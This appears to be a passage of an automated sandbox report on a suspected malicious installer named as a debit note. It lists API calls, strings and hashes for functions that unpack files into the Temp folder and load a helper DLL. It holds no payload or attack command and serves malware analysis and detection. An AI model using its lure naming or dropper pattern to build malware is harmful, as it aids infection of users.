CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,?,?,00405E0A,?,?,00000001,00405982,?,00000000,000000F1,?), ref: 00405C9A
GetShortPathNameW.KERNEL32(00000000,00425D88,00000400), ref: 00405CA3

Part of subcall function 00405B19: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
Part of subcall function 00405B19: lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B

GetShortPathNameW.KERNEL32(?,00426588,00000400), ref: 00405CC0
wsprintfA.USER32 ref: 00405CDE
GetFileSize.KERNEL32(00000000,00000000,00426588,C0000000,00000004,00426588,?,?,?,?,?), ref: 00405D19
GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405D28
lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405D60
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00425988,00000000,-0000000A,00409560,00000000,[Rename],00000000,00000000,00000000), ref: 00405DB6
WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405DC8
GlobalFree.KERNEL32(00000000), ref: 00405DCF
CloseHandle.KERNEL32(00000000), ref: 00405DD6

Part of subcall function 00405BB4: GetFileAttributesW.KERNELBASE(00000003,00402DFF,C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe,80000000,00000003), ref: 00405BB8
Part of subcall function 00405BB4: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405BDA

Strings

[Rename], xrefs: 00405D48, 00405D5A
NUL, xrefs: 00405C70
%ls=%ls, xrefs: 00405CD4

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
String ID: %ls=%ls$NUL$[Rename]
API String ID: 1265525490-899692902
Opcode ID: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
Instruction ID: 10a6a65bcc8db41326b0965a868e5b78be2cc6b43571d182478210b5aa6aebd6
Opcode Fuzzy Hash: 559503feb89d21a9c334d896a0f7a2de64537d5462d12f25622628eabbc9644b
Instruction Fuzzy Hash: E941FE71604A18BFD2206B61AC4CF6B3A6CEF45714F24443BB901B62D2EA78AD018A7D

Function 00401000 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
BeginPaint.USER32(?,?), ref: 00401047
GetClientRect.USER32(?,?), ref: 0040105B
CreateBrushIndirect.GDI32(00000000), ref: 004010CF
FillRect.USER32(00000000,?,00000000), ref: 004010E4
DeleteObject.GDI32(?), ref: 004010ED
CreateFontIndirectW.GDI32(?), ref: 00401105
SetBkMode.GDI32(00000000,00000001), ref: 00401126
SetTextColor.GDI32(00000000,000000FF), ref: 00401130
SelectObject.GDI32(00000000,?), ref: 00401140
DrawTextW.USER32(00000000,00428200,000000FF,00000010,00000820), ref: 00401156
SelectObject.GDI32(00000000,00000000), ref: 00401160
DeleteObject.GDI32(?), ref: 00401165
EndPaint.USER32(?,?), ref: 0040116E

Strings

F, xrefs: 0040100C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
String ID: F
API String ID: 941294808-1304234792
Opcode ID: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction ID: fcf32cd20748a1213536d9d4e972d5f65e682a1af5e7fde79162f5b09e182029
Opcode Fuzzy Hash: c8f07ac8fddda19ee2bf7cb4f90658f54556206f608d49a47768e3a2d0e378b6
Instruction Fuzzy Hash: D2418B71804249AFCB058FA5DD459BFBBB9FF44310F00852AF561AA1A0C738EA51DFA5

Function 004061DC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 0040623F
CharNextW.USER32(?,?,?,00000000), ref: 0040624E
CharNextW.USER32(?,"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406253
CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,77223420,00403542), ref: 00406266

Strings

"C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe", xrefs: 00406220
*?|<>/":, xrefs: 0040622E
C:\Users\user\AppData\Local\Temp\, xrefs: 004061DD, 004061E2

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\debit-note-19-08-dn-2024.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-4178287676
Opcode ID: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction ID: 5b12d47152ff200ae170f947aa1a5954375b24b0904b9d00ef93706c4e891e75
Opcode Fuzzy Hash: 1606a10478bcb54d9e464e7e1942e813b7f97a0a03c371f366e1e5ab139a473f
Instruction Fuzzy Hash: 1311E61580020295DB303B548C44AB772F8EF95750F42807FED9A732C1E77C5CA286BD

Function 004024EE Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 54filestringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000400,?,?,00000021), ref: 0040252F
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,?,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp,000000FF,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000400,?,?,00000021), ref: 00402536
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 00402568

Strings

C:\Users\user\AppData\Local\Temp\nsb5059.tmp, xrefs: 00402528
C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll, xrefs: 004024FA, 0040251B, 00402525, 00402535, 0040255C
8, xrefs: 0040250C

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ByteCharFileMultiWideWritelstrlen
String ID: 8$C:\Users\user\AppData\Local\Temp\nsb5059.tmp$C:\Users\user\AppData\Local\Temp\nsb5059.tmp\System.dll
API String ID: 1453599865-377791387
Opcode ID: 6125aa081e30e47da40ee1c37d73e388ad7d86d91ab132d95cfa165a77b7831e
Instruction ID: a0446c0b0672562d506aa58c1ab7e20caafec20b23fb80a76c6cc5bad6f3e06b
Opcode Fuzzy Hash: 6125aa081e30e47da40ee1c37d73e388ad7d86d91ab132d95cfa165a77b7831e
Instruction Fuzzy Hash: C0015271A44214FFD700AFB09E8AEAB7278AF51719F20453BB102B61D1D6BC5E419A2D

Function 00404201 Relevance: 12.1, APIs: 8, Instructions: 61COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040421E
GetSysColor.USER32(00000000), ref: 0040423A
SetTextColor.GDI32(?,00000000), ref: 00404246
SetBkMode.GDI32(?,?), ref: 00404252
GetSysColor.USER32(?), ref: 00404265
SetBkColor.GDI32(?,?), ref: 00404275
DeleteObject.GDI32(?), ref: 0040428F
CreateBrushIndirect.GDI32(?), ref: 00404299

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction ID: b52404dbcc62fb778985b33cde271554a932a1fc376a4a1675ca0a40f23ca1f0
Opcode Fuzzy Hash: b90be86f4b41523f1c687d93ae3cdfe665fb5c0f546787b0b5a2f8f889851cd4
Instruction Fuzzy Hash: B821A4B1A04704ABCB219F68DD08B4B7BF8AF80700F04896DFD91E22E1C338E804CB65

Function 004027B5 Relevance: 10.6, APIs: 7, Instructions: 89memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 00402809
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,?,000000F0), ref: 00402825
GlobalFree.KERNEL32(FFFFFD66), ref: 0040285E
WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,000000F0), ref: 00402870
GlobalFree.KERNEL32(00000000), ref: 00402877
CloseHandle.KERNEL32(?,?,?,?,?,?,000000F0), ref: 0040288F
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,?,000000F0), ref: 004028A3

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
Instruction ID: c76d0c3f0677147b44531d70e17f5e21854c5a6159b3e076b4812541e28699f2
Opcode Fuzzy Hash: 175540e7daea46f04fdcb39c2d6b9fb6ccbbe72b81495e9a418fab8b18cc96be
Instruction Fuzzy Hash: C931BF72C00118BBDF11AFA5CE49DAF7E79EF04324F20423AF510762E1C6796E418BA9

Function 00402D1A Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402D35
GetTickCount.KERNEL32 ref: 00402D53
wsprintfW.USER32 ref: 00402D81

Part of subcall function 004051F2: lstrlenW.KERNEL32(004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,004216C8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
Part of subcall function 004051F2: lstrcatW.KERNEL32(004216C8,00402D94,00402D94,004216C8,00000000,00000000,00000000), ref: 0040524D
Part of subcall function 004051F2: SetWindowTextW.USER32(004216C8,004216C8), ref: 0040525F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD

CreateDialogParamW.USER32(0000006F,00000000,00402C7F,00000000), ref: 00402DA5
ShowWindow.USER32(00000000,00000005), ref: 00402DB3

Part of subcall function 00402CFE: MulDiv.KERNEL32(00000000,00000064,0000019F), ref: 00402D13

Strings

... %d%%, xrefs: 00402D7B

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
Instruction ID: 6ab1becf65089363c82906b09123353a2bcc309babf83807567d4fce196db36a
Opcode Fuzzy Hash: 005642a4020e0a71c09553eb7eb2d495990d68115b85ca719a2b531c3bc6c152
Instruction Fuzzy Hash: CD015E31909220EBC7616B64EE5DBDB3A68AB00704B14457BF905B11F1C6B85C45CFAE

Function 00404ABC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404AD7
GetMessagePos.USER32 ref: 00404ADF
ScreenToClient.USER32(?,?), ref: 00404AF9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404B0B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404B31

Strings

f, xrefs: 00404B0D

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction ID: 0eecd9b69481b59551465bcf9db52b38cf56a1a0cd5b93a9aa54e622b558eefa
Opcode Fuzzy Hash: 06f6ebea5bc1d9fbd35e9f77c39338462eb0780e6261c6c1cca29060ed6e4b7a
Instruction Fuzzy Hash: 4B015E71E00219BADB10DBA4DD85FFEBBBCAB94711F10012BBB10B61D0D7B4A9018BA5

Function 00402C7F Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402C9D
wsprintfW.USER32 ref: 00402CD1
SetWindowTextW.USER32(?,?), ref: 00402CE1
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402CF3

Strings

unpacking data: %d%%, xrefs: 00402CBF, 00402CCF
verifying installer: %d%%, xrefs: 00402CC6

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction ID: 6313022a6a14420ec29aadc91542e870ad3eb66361cb8d6516b6428425dce57e
Opcode Fuzzy Hash: fb2a05d00326c25166bc5f9aaa13d1f718a743be953a9e67bdfa073c3cfab417
Instruction Fuzzy Hash: 36F01270504108ABEF205F50DD4ABAE3768BB00309F00843AFA16B51D1DBB95959DB59

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 3b2da28fc6c9bb4151d71d136a2166c584fe2e1793c0aa67a83c17282771645f
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98COMMON

Download Yara Rule

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Function 004049D6 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 78stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(004226E8,004226E8,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,0000040F,00000400,00000000), ref: 00404A67
wsprintfW.USER32 ref: 00404A70
SetDlgItemTextW.USER32(?,004226E8), ref: 00404A83

Strings

&B, xrefs: 00404A56
%u.%u%s%s, xrefs: 00404A51

Memory Dump Source

Source File: 00000000.00000002.11403768510.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.11403694643.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403840276.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11403911339.0000000000449000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.11404167841.000000000044D000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$&B
API String ID: 3540041739-2907463167
Opcode ID: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
Instruction ID: b2bc00afb158c588b9a06456614f3f49c694bd1d1c2ad39e9d347cd1a0135542
Opcode Fuzzy Hash: bc3b7f17ced557010f42f2a5da3d553c1ee365e0fd64efe36082f95fd3b84f34
Instruction Fuzzy Hash: 131126737001247BCB10A66D9C45EDF324DDBC5334F144237FA65F60D1D938882186E8

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000000.00000002.11419527256.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.11419505388.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419552183.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000000.00000002.11419574238.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_debit-note-19-08-dn-2024.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

